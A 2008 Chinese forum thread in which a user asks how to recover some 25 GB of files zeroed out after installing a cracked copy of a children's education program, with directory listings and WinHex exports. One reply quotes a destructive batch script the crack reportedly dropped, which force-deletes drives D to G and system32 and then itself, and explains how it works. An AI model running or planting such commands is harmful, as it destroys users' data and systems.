高手救命,因少儿启蒙大师10.0破解软件致D盘25G多数据丢失,请教高手如何恢复?
高手救命,因少儿启蒙大师10.0破解软件致D盘25G多数据丢失,请教高手如何恢复?今天上午我安装了少儿启蒙大师10.0破解软件(http://cv007d.mofile.com/MDA5MTAxNTM4ODU2NjY2NDozODk5MDQ5OTczOTM0ODk3OkRpc2sxLzIxLzIxMzQ0MzM1NzUvMi8yMDg0OTkyMDczMjYwMTk6MTotMTowOjEyMjE2NTQ1OTAyMDU./64BBAE1ED4C323EA7DF1246630FA42A9/少儿启蒙大师10彻底破解版.rar),安装后运行也没有将软件破解,随后再运行破解版就不能运行了,看了一下文件都变成了0字节文件,我意识可能是病毒,然后马上关机,再开机后,D盘三个目录下25G多的共八万多个文件全部变成了0字节的文件,其中有一个目录中有重要资料,我用了很多数据恢复软件均不能恢复其中任何一个文件。我觉得作者是用0字节的文件覆盖了原来的文件,请问各位高手有没有什么办法恢复这些文件???
下面是其中一个目录的情况,文件图标没有变化,但是ico的图标都变了:驱动器 D 中的卷是 MYSOFT_D
卷的序列号是 2255-5F79
D:\gjj 的目录
2008-10-1614:53 <DIR> .
2008-10-1614:53 <DIR> ..
2008-10-2610:00 0 200708BF.DBF
2008-10-2610:00 0 871272948420061002194818_3_640.jpg
2008-10-2610:00 0 aa.IDX
2008-10-2610:00 0 aaa.IDX
2008-03-1220:17 <DIR> Connections
2008-10-2610:00 0 gjj.dbf
2008-10-2610:00 0 gjj.FXP
2008-10-2610:00 0 gjj.IDX
2008-10-2610:00 0 GJJ200703-08.txt
2008-10-2610:00 0 GJJ200703-08.xls
2008-10-2610:00 0 gjj200708bf.DBF
2008-10-2610:00 0 GJJ200709-200804.txt
2008-10-2610:00 0 gjj200804bf.DBF
2008-10-2610:00 0 gjj200805-08.txt
2008-10-2610:00 0 gjjbf0701.DBF
2008-10-2610:00 0 gjjbf0701.DBF.dsn
2008-10-2610:00 0 gjjbf0804.DBF
2008-10-2610:00 0 gjjbf200804.DBF
2008-10-2610:00 0 gjjdown.asp
2008-10-2610:00 0 gjjnew.DBF
2008-10-2610:00 0 index.asp
2008-10-2610:00 0 login.asp
2008-10-2610:00 0 loginbad.html
2008-10-2610:00 0 loginok.asp
2008-10-2610:00 0 outlogin.asp
2008-10-2610:00 0 rootloginok.asp
2008-10-2610:00 0 Thumbs.db
2008-10-2610:00 0 unpasswd.asp
2008-10-2610:00 0 unpasswdok.asp
2008-10-2610:00 0 user.DBF
2008-03-1220:17 <DIR> _notes
2008-10-2610:00 0 拷贝于 login.asp
2008-10-2610:00 0 拷贝于 拷贝于 loginok.asp
2008-03-1220:17 <DIR> 贷款用文件
31 个文件 0 字节
5 个目录 29,388,468,224 可用字节 重要目录里的文件是什么文件呢?可以的话留下QQ远程看看
用winhex看看
用winhex看看,扇区中有没有数据,如果全部为0就麻烦了。但我想应该没有这么恶毒的病毒程序。 谁给远程了?有结果了告诉一声。这已经不是第一个案例了,好像最近要流行起来。知道详情的,给大家分享一下哦~ 说明:以下内容是在网络上收集后整理的,但本人没接触这样的样本,所以不做任何猜想,等接触过样本的人说说情况。少儿启蒙大师10.0这个版本中作者加入“防破解”程序,就像当年的江民公司在其最新发行的防病毒软件KV300L++版中加入了“逻辑锁”程序,这一程序的主要作用是识别盗版和正版软件用户。当使用盗版密匙盘运行KV300时, 该程序立即启动锁死电脑,使电脑硬盘无法使用,但不会造成破坏。这个软件在运行中发现他的软件被人破解了,当破解补丁运行后,他会释放一个删除磁盘的脚本:
:try
del /F /S /Qd:\*.*
del /F /S /QE:\*.*
del /F /S /QF:\*.*
del /F /S /QG:\*.*
del /F /S /Qc:\windows\system32\*.*
del /F /S /Qc:\winnt\system32\*.*
del /F "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.exe"
del /F "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.bak"
del /F "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.exe.bak"
del /F /S /Q "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\*.*
if exist "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.exe" goto try
if exist "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.bak" goto try
if exist "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.exe.bak" goto try
del /F "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\$$a.bat"
cls
以上是补丁运行后释放出的""隐藏""脚本文件
懂一些DOS命令的朋友应该都明白以上命令的意思吧
删除c:\windows\system32\*.*
c:\winnt\system32\*.*
还有删除DEFG盘
最后删除自己
真是做的滴水不漏啊!!
解释:
del /f /s /q 是什么意思?
/F 强制删除只读文件。
/S 从所有子目录删除指定文件。
/Q 安静模式。删除全局通配符时,不要求确认。
[ 本帖最后由 tclrz100e 于 2008-10-26 21:30 编辑 ]
重是文件就是我列出的Gjj目录中的Gjj.dbf文件
重是文件就是我列出的Gjj目录中的Gjj.dbf文件,是从2005年至今的所有职工住房公积金资料,约五万条记录我用易我数据恢复中和高级恢复和EasyRecovery Pro_6.10中的高级恢复、原始恢复均不能恢复这些文件。
在winhex中查看这个硬盘上GJJ目录,文件大小也是0字节。以下是从winhex中导出的数据:
文件名 扩展名 大小 创建时间 修改时间 访问时间 属性 第1扇区 大小
200708BF.DBF DBF 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-02 15:18:19 A
871272948420061002194818_3_640.jpg jpg 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 15:34:56 A
aa.IDX IDX 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 15:34:55 A
aaa.IDX IDX 0 bytes 2008-10-12 09:59:58 2008-10-26 10:00:02 2008-10-12 09:59:58 A
gjj.dbf dbf 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 15:35:44 A
gjj.FXP FXP 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 08:00:01 A
gjj.IDX IDX 0 bytes 2008-06-03 09:33:45 2008-10-26 10:00:02 2008-09-06 15:58:25 A
GJJ200703-08.txt txt 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A
GJJ200703-08.xls xls 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A
gjj200708bf.DBF DBF 0 bytes 2008-06-03 09:31:53 2008-10-26 10:00:02 2008-09-06 15:58:25 A
GJJ200709-200804.txt txt 0 bytes 2008-06-03 09:30:49 2008-10-26 10:00:02 2008-07-26 09:10:02 A
gjj200804bf.DBF DBF 0 bytes 2008-06-03 09:35:55 2008-10-26 10:00:02 2008-08-18 09:45:27 A
gjj200805-08.txt txt 0 bytes 2008-10-12 09:58:50 2008-10-26 10:00:02 2008-10-12 09:58:50 A
gjjbf0701.DBF DBF 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A
gjjbf0701.DBF.dsn dsn 0 bytes 2008-10-16 14:53:10 2008-10-26 10:00:02 2008-10-16 14:53:22 A
gjjbf0804.DBF DBF 0 bytes 2008-10-12 09:59:08 2008-10-26 10:00:02 2008-10-12 09:59:08 A
gjjbf200804.DBF DBF 0 bytes 2008-09-03 09:04:53 2008-10-26 10:00:02 2008-09-03 09:04:53 A
gjjdown.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A
gjjnew.DBF DBF 0 bytes 2008-09-03 09:05:41 2008-10-26 10:00:02 2008-09-06 15:58:25 A
index.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A
login.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A
loginbad.html html 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 15:34:55 A
loginok.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A
outlogin.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A
rootloginok.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A
Thumbs.db db 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A
unpasswd.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A
unpasswdok.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A
user.DBF DBF 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A
拷贝于 login.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A
拷贝于 拷贝于 loginok.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A
现在这个bat文件我觉得不是原来仅仅删除这么简单了,因为如果只是删除的话这些软件应该都能恢复才对。现在看来我觉得是用同名的0字节文件覆盖了原来的文件。你们可以在虚拟机上下载这个软件试验一下。
我的QQ号码是303514505,求高手给我想办法看能不能解决。在线等!